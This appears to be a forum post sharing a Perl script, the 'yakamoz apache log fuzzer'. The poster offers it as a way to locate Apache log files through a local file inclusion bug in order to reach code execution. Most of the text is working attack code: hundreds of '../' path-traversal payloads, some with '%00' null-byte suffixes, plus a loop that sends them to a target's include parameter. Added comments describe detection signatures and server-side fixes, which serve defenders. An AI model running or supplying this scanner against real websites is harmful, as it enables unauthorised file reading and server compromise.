Sometimes you find an LFI (local file inclusion) bug, which is rare nowadays,
and you need to find the Apache log files for code execution; this tool comes in handy for that.

code:
#!/usr/bin/perl

use http::request;
use lwp::useragent;
# Interactive front end: clear the console, print the banner, then read the
# base URL that every candidate path is later appended to.
# "cls" is the Windows console clear command; it is run through the shell.
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_____________________________________________ ____\n";
print "\t\t\t yakamoz apache log fuzzer ver.1.0\n";
print "\t\t\t coded by bl4ck.viper\n";
print "\t\t\t thanks from 2mzrp\n";
print "\t\t_____________________________________________ ____\n";
print "\n\n";
sleep (1);
print "\t\t\t\t welcome\n";
print "\n";
print "\n\n";
# The prompt expects a URL that ends in an include-style query parameter
# ("...index.php?page="), so the appended path becomes that parameter's value.
print "\t insert target (ex: http://www.site.com/index.php?page=)\n";
print "\t target :";
# Read one line from standard input and drop the trailing newline. The value
# is used as typed: the script never parses or validates it as a URL.
$host=<stdin>;
chomp($host);
# The match is unanchored and looks only for the literal "http://"; any other
# input, including an https:// URL, gets "http://" prepended.
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* working in progress *-*-*-*-*-*\n";
print "\n\n";
# Candidate values for the include parameter: relative "../" traversals of
# increasing depth ending at guessed Apache log locations (apache/logs,
# etc/httpd/logs, usr/local/apache/logs, var/log/apache).
# Each location is listed in two variants: a plain one, whose literal carries
# a trailing space inside the quotes, and one ending in "%00" (URL-encoded NUL
# byte). Current PHP releases reject NUL bytes in file paths, so the "%00"
# variants only matter against legacy runtimes.
# Review notes on the data itself:
#   - the etc/httpd/logs/error_log group appears twice, so those requests are
#     sent twice per scan;
#   - one etc/httpd/logs group is spelled "acces_log" (single "s"), presumably
#     a typo, since a correctly spelled access_log group follows later.
# For detection: a scan produces a burst of GET requests against one parameter
# whose value consists of repeated "../" segments ending in *access*log /
# *error*log, optionally followed by "%00"; the misspelled "acces_log" path is
# a distinctive string to search server logs or WAF events for.
@logs= ('../apache/logs/access.log ',
'../../apache/logs/access.log ',
'../../../apache/logs/access.log ',
'../../../../apache/logs/access.log ',
'../../../../../apache/logs/access.log ',
'../../../../../../apache/logs/access.log ',
'../../../../../../../apache/logs/access.log ',
'../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../../../apache/logs/access.log ',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../apache/logs/error.log ',
'../../../apache/logs/error.log ',
'../../../../apache/logs/error.log ',
'../../../../../apache/logs/error.log ',
'../../../../../../apache/logs/error.log ',
'../../../../../../../apache/logs/error.log ',
'../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../../../apache/logs/error.log ',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../etc/httpd/logs/acces_log ',
'../../etc/httpd/logs/acces_log ',
'../../../etc/httpd/logs/acces_log ',
'../../../../etc/httpd/logs/acces_log ',
'../../../../../etc/httpd/logs/acces_log ',
'../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../usr/local/apache/logs/access_log ',
'../../usr/local/apache/logs/access_log ',
'../../../usr/local/apache/logs/access_log ',
'../../../../usr/local/apache/logs/access_log ',
'../../../../../usr/local/apache/logs/access_log ',
'../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../usr/local/apache/logs/access_log%00',
'../../usr/local/apache/logs/access_log%00',
'../../../usr/local/apache/logs/access_log%00',
'../../../../usr/local/apache/logs/access_log%00',
'../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../usr/local/apache/logs/access.log ',
'../../usr/local/apache/logs/access.log ',
'../../../usr/local/apache/logs/access.log ',
'../../../../usr/local/apache/logs/access.log ',
'../../../../../usr/local/apache/logs/access.log ',
'../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../usr/local/apache/logs/access.log%00',
'../../usr/local/apache/logs/access.log%00',
'../../../usr/local/apache/logs/access.log%00',
'../../../../usr/local/apache/logs/access.log%00',
'../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../etc/httpd/logs/access_log ',
'../../etc/httpd/logs/access_log ',
'../../../etc/httpd/logs/access_log ',
'../../../../etc/httpd/logs/access_log ',
'../../../../../etc/httpd/logs/access_log ',
'../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../../etc/httpd/logs/access_log ',
'../etc/httpd/logs/access_log%00',
'../../etc/httpd/logs/access_log%00',
'../../../etc/httpd/logs/access_log%00',
'../../../../etc/httpd/logs/access_log%00',
'../../../../../etc/httpd/logs/access_log%00',
'../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../../etc/httpd/logs/access_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../var/log/apache/access_log ',
'../../var/log/apache/access_log ',
'../../../var/log/apache/access_log ',
'../../../../var/log/apache/access_log ',
'../../../../../var/log/apache/access_log ',
'../../../../../../var/log/apache/access_log ',
'../../../../../../../var/log/apache/access_log ',
'../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../../var/log/apache/access_log ',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../var/log/apache/access_log%00');

# Probe loop: one GET request per candidate path, one result line per request.
# The requests are sequential, with no delay, retry or timeout setting, so a
# full run reaches the server as a tight series of near-identical requests.
# Server-side, this class of probe is closed by never passing a request
# parameter into include/require (map it to an allowlist of known pages) and
# by keeping web-server logs unreadable to the account the application runs as.
foreach $scan(@logs){

# Plain string concatenation: the candidate is appended to the user-supplied
# prefix without any URL encoding.
$url = $host.$scan;
$request = http::request->new(get=>$url);
# A fresh user agent is built on every iteration and no agent string is set,
# so LWP's default "libwww-perl/<version>" User-Agent header is sent, which is
# a useful field to filter on when hunting for this scan in access logs.
$useragent = lwp::useragent->new();

$response = $useragent->request($request);
# Hit heuristic: any successful response whose body contains the lower-case
# substring "apache". This is unreliable in both directions: an ordinary page
# or error template that mentions "apache" is reported as a hit, and an
# included log without that exact substring is missed.
# "vulnerability" is a bareword; with no "use strict" in this script Perl
# treats it as the string "vulnerability".
if ($response->is_success && $response->content =~ /apache/) { $msg = vulnerability;}
else { $msg = "not found";}
print "$scan..........[$msg]\n";
}

